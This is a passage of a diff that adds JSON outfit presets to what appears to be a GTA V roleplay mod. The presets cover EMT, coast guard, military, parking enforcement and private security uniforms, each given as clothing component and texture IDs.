+"UpperSkin": "87:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "46:7", +"Shoes": "43:3", +"Accessories": "118:6", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Paleto Bay Scrubs", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "12:1", +"Top": "17:6", +"UpperSkin": "102:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "48:7", +"Shoes": "11:2", +"Accessories": "103:6", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Paleto Bay ICU Doctor", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "116:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "41:4", +"Pants": "46:7", +"Shoes": "100:2", +"Accessories": "117:9", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Paleto Bay MD Specialist", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "116:1", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "97:7", +"Pants": "11:1", +"Shoes": "41:10", +"Accessories": "117:10", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Paleto Bay ICU Doctor", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "8:3", +"Mask": "1:1", +"Top": "108:1", +"UpperSkin": "110:1", +"Decal": "1:1", +"UnderCoat": "17:4", +"Pants": "48:7", +"Shoes": "11:2", +"Accessories": "88:9", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female Paleto Bay MD Specialist", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "20:10", +"Ear": "0:0", +"Watch": "8:3", +"Mask": "1:1", +"Top": "108:1", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "105:13", +"Pants": "4:4", +"Shoes": "43:4", +"Accessories": "88:10", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male McGroan EMT Class B", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "215:20", +"UpperSkin": "89:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "31:1", +"Armor": "30:1", +"Parachute": "94:3" + }, + { +"Name": "Male McGroan EMT Class C", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "214:20", +"UpperSkin": "93:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "31:1", +"Armor": "30:1", +"Parachute": "94:3" + }, + { +"Name": "Female McGroan EMT Class B", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "219:20", +"UpperSkin": "102:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "15:1", +"Armor": "34:1", +"Parachute": "94:3" + }, + { +"Name": "Female McGroan EMT Class C", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "218:20", +"UpperSkin": "110:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "15:1", +"Armor": "34:1", +"Parachute": "94:3" + }, + { +"Name": "Male Generic EMT Class B", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "215:19", +"UpperSkin": "89:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "31:1", +"Armor": "30:1", +"Parachute": "94:2" + }, + { +"Name": "Male Generic EMT Class C", +"Gender": "Male", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "214:19", +"UpperSkin": "93:1", +"Decal": "1:1", +"UnderCoat": "55:1", +"Pants": "102:1", +"Shoes": "52:1", +"Accessories": "31:1", +"Armor": "30:1", +"Parachute": "94:2" + }, + { +"Name": "Female Generic EMT Class B", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "219:19", +"UpperSkin": "102:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "15:1", +"Armor": "34:1", +"Parachute": "94:2" + }, + { +"Name": "Female Generic EMT Class C", +"Gender": "Female", +"Category": "SUP", +"Category2": "Medical Services", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "218:19", +"UpperSkin": "110:1", +"Decal": "1:1", +"UnderCoat": "7:1", +"Pants": "106:1", +"Shoes": "53:1", +"Accessories": "15:1", +"Armor": "34:1", +"Parachute": "94:2" + }, + { +"Name": "Male USCG Fatigues", +"Gender": "Male", +"Category": "SUP", +"Category2": "United States Armed Forces", +"Hat": "11:4", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "38:3", +"UpperSkin": "1:1", +"Decal": "25:1", +"UnderCoat": "16:1", +"Pants": "53:3", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female USCG Fatigues", +"Gender": "Female", +"Category": "SUP", +"Category2": "United States Armed Forces", +"Hat": "11:4", +"Glasses": "23:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "113:3", +"UpperSkin": "15:1", +"Decal": "24:1", +"UnderCoat": "15:1", +"Pants": "55:3", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male U.S Coast Guard", +"Gender": "Male", +"Category": "SUP", +"Category2": "United States Armed Forces", +"Hat": "90:1", +"Glasses": "22:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "42:1", +"UpperSkin": "1:1", +"Decal": "25:1", +"UnderCoat": "88:1", +"Pants": "53:3", +"Shoes": "25:1", +"Accessories": "2:1", +"Armor": "47:1", +"Parachute": "49:1" + }, + { +"Name": "Female U.S Coast Guard", +"Gender": "Female", +"Category": "SUP", +"Category2": "United States Armed Forces", +"Hat": "89:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "39:1", +"UpperSkin": "15:1", +"Decal": "24:1", +"UnderCoat": "66:1", +"Pants": "55:3", +"Shoes": "25:1", +"Accessories": "2:1", +"Armor": "49:1", +"Parachute": "1:1" + }, + { +"Name": "Male USCG Swat", +"Gender": "Male", +"Category": "SUP", +"Category2": "United States Armed Forces", +"Hat": "151:25", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "53:1", +"Top": "221:13", +"UpperSkin": "180:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "32:1", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "16:3", +"Parachute": "49:1" + }, + { +"Name": "Female USCG SWAT", +"Gender": "Female", +"Category": "SUP", +"Category2": "United States Armed Forces", +"Hat": "150:25", +"Glasses": "23:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "231:13", +"UpperSkin": "216:1", +"Decal": "1:1", +"UnderCoat": "104:5", +"Pants": "31:1", +"Shoes": "26:1", +"Accessories": "82:1", +"Armor": "28:1", +"Parachute": "49:1" + }, + { +"Name": "Male USCG Onepiece", +"Gender": "Male", +"Category": "SUP", +"Category2": "United States Armed Forces", +"Hat": "90:1", +"Glasses": "26:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "123:1", +"Top": "156:1", +"UpperSkin": "97:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "71:1", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female USCG Onepiece", +"Gender": "Female", +"Category": "SUP", +"Category2": "United States Armed Forces", +"Hat": "89:1", +"Glasses": "28:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "123:1", +"Top": "153:1", +"UpperSkin": "112:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "73:1", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male USCG Swimmer", +"Gender": "Male", +"Category": "SUP", +"Category2": "United States Armed Forces", +"Hat": "90:2", +"Glasses": "26:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "123:1", +"Top": "156:2", +"UpperSkin": "97:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "71:1", +"Shoes": "68:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female USCG Swimmer", +"Gender": "Female", +"Category": "SUP", +"Category2": "United States Armed Forces", +"Hat": "89:2", +"Glasses": "28:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "123:1", +"Top": "153:2", +"UpperSkin": "112:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "73:1", +"Shoes": "71:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male USCG Jumpsuit", +"Gender": "Male", +"Category": "SUP", +"Category2": "United States Armed Forces", +"Hat": "79:5", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "109:11", +"UpperSkin": "97:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "39:3", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female USCG Jumpsuit", +"Gender": "Female", +"Category": "SUP", +"Category2": "United States Armed Forces", +"Hat": "78:5", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "100:11", +"UpperSkin": "112:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "39:3", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male USCG Pilot", +"Gender": "Male", +"Category": "SUP", +"Category2": "United States Armed Forces", +"Hat": "79:5", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "156:3", +"UpperSkin": "17:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "71:2", +"Shoes": "25:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female USCG Pilot", +"Gender": "Female", +"Category": "SUP", +"Category2": "United States Armed Forces", +"Hat": "78:5", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "153:3", +"UpperSkin": "18:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "73:2", +"Shoes": "25:1", +"Accessories": "2:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male National Guard Fatigues", +"Gender": "Male", +"Category": "SUP", +"Category2": "United States Armed Forces", +"Hat": "29:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "38:1", +"UpperSkin": "1:1", +"Decal": "23:1", +"UnderCoat": "16:1", +"Pants": "88:1", +"Shoes": "36:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female National Guard Fatigues", +"Gender": "Female", +"Category": "SUP", +"Category2": "United States Armed Forces", +"Hat": "29:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "113:1", +"UpperSkin": "15:1", +"Decal": "22:1", +"UnderCoat": "15:1", +"Pants": "91:1", +"Shoes": "37:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male U.S. Army Combat Uniform", +"Gender": "Male", +"Category": "SUP", +"Category2": "United States Armed Forces", +"Hat": "40:2", +"Glasses": "24:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "221:26", +"UpperSkin": "142:20", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "38:3", +"Shoes": "36:1", +"Accessories": "111:1", +"Armor": "16:1", +"Parachute": "49:1" + }, + { +"Name": "Female U.S. Army Combat Uniform", +"Gender": "Female", +"Category": "SUP", +"Category2": "United States Armed Forces", +"Hat": "39:2", +"Glasses": "23:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "231:26", +"UpperSkin": "175:20", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "37:3", +"Shoes": "37:1", +"Accessories": "82:1", +"Armor": "18:1", +"Parachute": "49:1" + }, + { +"Name": "Male USAF Fatigues", +"Gender": "Male", +"Category": "SUP", +"Category2": "United States Armed Forces", +"Hat": "29:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "38:1", +"UpperSkin": "1:1", +"Decal": "24:1", +"UnderCoat": "3:2", +"Pants": "88:1", +"Shoes": "36:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female USAF Fatigues", +"Gender": "Female", +"Category": "SUP", +"Category2": "United States Armed Forces", +"Hat": "29:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "113:1", +"UpperSkin": "15:1", +"Decal": "23:1", +"UnderCoat": "15:1", +"Pants": "91:1", +"Shoes": "37:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male USAF Pilot Uniform", +"Gender": "Male", +"Category": "SUP", +"Category2": "United States Armed Forces", +"Hat": "39:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "49:1", +"UpperSkin": "17:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "31:1", +"Shoes": "25:1", +"Accessories": "34:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Female USAF Pilot Uniform", +"Gender": "Female", +"Category": "SUP", +"Category2": "United States Armed Forces", +"Hat": "38:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "42:1", +"UpperSkin": "18:1", +"Decal": "1:1", +"UnderCoat": "16:1", +"Pants": "30:1", +"Shoes": "25:1", +"Accessories": "17:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Parking Enforcement Class A", +"Gender": "Male", +"Category": "SUP", +"Category2": "Parking Enforcement", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "216:6", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "130:1", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "67:5" + }, + { +"Name": "Male Parking Enforcement Class B", +"Gender": "Male", +"Category": "SUP", +"Category2": "Parking Enforcement", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "215:6", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "130:1", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "22:5", +"Parachute": "67:5" + }, + { +"Name": "Male Parking Enforcement Class C", +"Gender": "Male", +"Category": "SUP", +"Category2": "Parking Enforcement", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "214:6", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "130:1", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "22:5", +"Parachute": "67:5" + }, + { +"Name": "Female Parking enforcement Class A", +"Gender": "Female", +"Category": "SUP", +"Category2": "Parking Enforcement", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "220:6", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "160:1", +"Pants": "35:1", +"Shoes": "56:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "67:5" + }, + { +"Name": "Female Parking enforcement Class B", +"Gender": "Female", +"Category": "SUP", +"Category2": "Parking Enforcement", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "219:6", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "160:1", +"Pants": "35:1", +"Shoes": "56:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "67:5" + }, + { +"Name": "Female Parking enforcement Class C", +"Gender": "Female", +"Category": "SUP", +"Category2": "Parking Enforcement", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "218:6", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "160:1", +"Pants": "35:1", +"Shoes": "56:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "67:5" + }, + { +"Name": "Male Parking Enforcement Jacket", +"Gender": "Male", +"Category": "SUP", +"Category2": "Parking Enforcement", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "152:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "130:1", +"Pants": "36:1", +"Shoes": "52:1", +"Accessories": "1:1", +"Armor": "13:4", +"Parachute": "67:5" + }, + { +"Name": "Female Parking Enforcement Jacket", +"Gender": "Female", +"Category": "SUP", +"Category2": "Parking Enforcement", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "149:1", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "160:1", +"Pants": "35:1", +"Shoes": "53:1", +"Accessories": "1:1", +"Armor": "12:4", +"Parachute": "1:1" + }, + { +"Name": "Male Gruppe Sechs Class A", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "42:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "216:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "43:1", +"Pants": "26:6", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "67:3" + }, + { +"Name": "Male Gruppe Sechs Class B", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "215:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "43:1", +"Pants": "26:6", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "67:3" + }, + { +"Name": "Male Gruppe Sechs Class C", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "11:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "214:1", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "43:1", +"Pants": "26:6", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "67:3" + }, + { +"Name": "Male Gruppe Sechs Pullover", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:20", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "43:1", +"Pants": "26:6", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "49:1" + }, + { +"Name": "Female Gruppe Sechs Class A", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "41:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "220:1", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "9:1", +"Pants": "4:10", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "67:3" + }, + { +"Name": "Female Gruppe Sechs Class B", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "219:1", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "9:1", +"Pants": "4:10", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "67:3" + }, + { +"Name": "Female Gruppe Sechs Class C", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "11:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "218:1", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "9:1", +"Pants": "4:10", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "67:3" + }, + { +"Name": "Male Security Coat", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "3:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "267:9", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "43:1", +"Pants": "26:6", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "49:1" + }, + { +"Name": "Female Security Coat", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "276:9", +"UpperSkin": "37:1", +"Decal": "1:1", +"UnderCoat": "9:1", +"Pants": "4:10", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "49:1" + }, + { +"Name": "Male Armored Divison Class A", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "42:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "216:3", +"UpperSkin": "5:1", +"Decal": "76:1", +"UnderCoat": "21:4", +"Pants": "26:7", +"Shoes": "55:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "67:3" + }, + { +"Name": "Male Armored Divison Class B", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "11:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "215:2", +"UpperSkin": "5:1", +"Decal": "74:1", +"UnderCoat": "21:4", +"Pants": "26:7", +"Shoes": "55:1", +"Accessories": "9:1", +"Armor": "3:1", +"Parachute": "21:1" + }, + { +"Name": "Male Armored Division Class C", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "11:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "214:2", +"UpperSkin": "12:1", +"Decal": "74:1", +"UnderCoat": "21:4", +"Pants": "26:7", +"Shoes": "55:1", +"Accessories": "9:1", +"Armor": "3:1", +"Parachute": "21:1" + }, + { +"Name": "Male Armored Divison Pullover", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "11:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:22", +"UpperSkin": "5:1", +"Decal": "74:1", +"UnderCoat": "21:4", +"Pants": "26:7", +"Shoes": "55:1", +"Accessories": "9:1", +"Armor": "3:1", +"Parachute": "21:1" + }, + { +"Name": "Female Armored Divison Class A", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "41:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "220:3", +"UpperSkin": "4:1", +"Decal": "85:1", +"UnderCoat": "20:4", +"Pants": "4:16", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "67:3" + }, + { +"Name": "Female Armored Divison Class B", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "11:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "219:2", +"UpperSkin": "4:1", +"Decal": "83:1", +"UnderCoat": "20:4", +"Pants": "4:16", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "3:1", +"Parachute": "21:1" + }, + { +"Name": "Female Armored Divison Class C", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "11:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "218:2", +"UpperSkin": "10:1", +"Decal": "83:1", +"UnderCoat": "20:4", +"Pants": "4:16", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "3:1", +"Parachute": "21:1" + }, + { +"Name": "Female Armored Divison Pullover", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "11:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "224:22", +"UpperSkin": "4:1", +"Decal": "83:1", +"UnderCoat": "20:4", +"Pants": "4:16", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "3:1", +"Parachute": "21:1" + }, + { +"Name": "Male VIP Security", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "122:1", +"Top": "11:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "179:1", +"Pants": "11:1", +"Shoes": "11:1", +"Accessories": "39:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Bouncer", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "122:1", +"Top": "19:4", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "23:5", +"Shoes": "11:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Merryweather Security Guard", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "11:5", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "19:1", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "43:1", +"Pants": "87:3", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "49:1" + }, + { +"Name": "Female Merryweather Security Guard", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "11:5", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "46:1", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "9:1", +"Pants": "90:3", +"Shoes": "56:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "1:1" + }, + { +"Name": "Male Merryweather Contractor", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "11:5", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "74:3", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "88:1", +"Pants": "87:3", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "7:1", +"Parachute": "49:1" + }, + { +"Name": "Male Merryweather Enforcer", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "11:5", +"Glasses": "24:1", +"Ear": "2:1", +"Watch": "0:0", +"Mask": "1:1", +"Top": "221:22", +"UpperSkin": "180:1", +"Decal": "1:1", +"UnderCoat": "88:1", +"Pants": "87:7", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "7:5", +"Parachute": "49:1" + }, + { +"Name": "Female Merryweather Enforcer", +"Gender": "Female", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "11:5", +"Glasses": "26:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "231:23", +"UpperSkin": "216:1", +"Decal": "1:1", +"UnderCoat": "66:1", +"Pants": "90:7", +"Shoes": "26:1", +"Accessories": "2:1", +"Armor": "9:5", +"Parachute": "49:1" + }, + { +"Name": "Male Merryweather PMC-I", +"Gender": "Male", +"Category": "SUP", +"Category2": "Private Security", +"Hat": "11:7", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", 